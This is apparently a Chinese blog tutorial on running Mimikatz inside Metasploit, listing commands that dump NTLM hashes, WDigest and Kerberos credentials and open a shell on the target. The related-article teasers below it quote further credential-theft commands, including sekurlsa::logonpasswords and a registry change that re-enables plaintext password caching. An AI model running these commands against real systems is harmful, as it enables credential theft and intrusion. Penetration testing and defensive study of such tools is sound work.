mimikatza的使用

最新推荐文章于 2024-08-07 09:45:00 发布
最新推荐文章于 2024-08-07 09:45:00 发布
阅读量548 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 内网渗透 网络安全 网络攻防 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/115280361
版权

Mimikatza介绍

Mimikatza是一款后渗透测试工具。它能够从Windows认证的进程中获取内存,并且获取明文密码和NTLM哈希值的工具。这个工具已被集成到MSF框架上,它允许方便地访问它一系列的特性,而不需要上传任何文件到目标机器上。有关NTLM的相关知识可参考以下文章:
https://blog.csdn.net/qq_26886929/article/details/53905654

相关命令及作用

首先我们先在msf中导入mimikatza这个模块

在这里插入图片描述

msv:导出hash和认证信息

在这里插入图片描述

wdigest:获取本地用户信息及密码

在这里插入图片描述

kerberos:导出kerberos认证信息

在这里插入图片描述

mimikatz_command -f a::随便输入一个模块a::查看帮助信息

在这里插入图片描述

mimikatz_command -f samdump::hashes:查看用户的ID号和对应的hash值

在这里插入图片描述

mimikatz_command -f process::list:查看对应主机开启了哪些进程

在这里插入图片描述

mimikatz_command -f service::list:查看该主机上开了哪些服务

在这里插入图片描述

mimikatz_command -f handle::list:也是查看相应的进程,不过handle能进行令牌假冒

在这里插入图片描述

mimikatz_command -f nogpo::cmd:在对应主机上开启一个cmd窗口
mimikatz_command -f nogpo::regedit:在对应主机上开启注册表

在这里插入图片描述

mimikatz_command -f minesweeper::infos:在win7上玩扫雷,破解透视

在这里插入图片描述

平凡的学者
关注
专栏目录
mimikatz使用方法
课嗨教育的专栏
04-23 3812
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
Linux版的Mimikaz
dcx3291777的博客
05-22 180
A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. https://github.com/huntergregal/mimipenguin Details ...
萌新如何玩转mimikatz
最新发布
Python单行客的博客
08-07 1068
萌新如何玩转mimikatz
mimikatz使用详解
qq_59468567的博客
04-12 584
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
mimikatz使用
weixin_30526593的博客
11-27 220
一.简介 mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从lsass中获取当前处于Active系统的登录密码,lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在lsass内存中,经过其wdigest 和 tspkg 两个...
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1368
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 3962
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
内网渗透中的mimikatz
ShadowAssassin的专栏
04-04 1490
原文: http://drops.wooyun.org/tips/7547 0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: 域内一台主机
mimikatz工具使用
weixin_45605313的博客
07-10 1322
mimikatz使用命令:msf下的mimikatz mimikatz:后渗透工具,从window进程中获取内存,并获取明文密码和NTLM哈希值的工具。 kali路径:/usr/share/windows-resources/mimikatz 使用 将工具移植到靶机中: win32目录下 命令: 命令 含义 :: 查询帮助信息 standard:基础命令 命令 含义 exit 退出 cls 清屏 version 版本 cd 切换目录 localt
内网渗透系列-mimikatz使用以及后门植入
lza20001103的博客
04-15 1302
内网渗透系列-mimikatz使用以及后门植入
内网渗透系列之mimikatz使用以及后门植入
lza20001103的博客
09-04 4406
内网渗透系列之mimikatz使用以及后门植入 文章目录内网渗透系列之mimikatz使用以及后门植入前言mimikatz使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6962
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
Mimikatz介绍
#7的博客
03-26 1835
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
mimikatz工具的介绍和基本使用
菜鸟-宇的个人博客
10-02 1477
该模块是用于提权的模块。mimikatz 很多模块需要高权限运行,因此执行高权限操作模块的时候需要先利用 privilege 模块进行提权。如下命令是用于提权的命令,只能用具有管理员权限的窗口执行该命令才能成功,普通用户权限执行该提权命令会失败。
mimikatz常见命令
G3et的博客
01-29 1544
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
内网渗透之某后渗透利用【网络安全
kali_Ma的博客
03-23 3410
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。
【免杀】mimikatz源码+特征码
zhangshuaiijie的博客
06-23 1832
关于免杀网络上的信息对新手来说相对少很多,不是看不懂就是压根不能用,这也算是一个记录吧,我也不敢保证能不能成功。
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1987
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7208
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值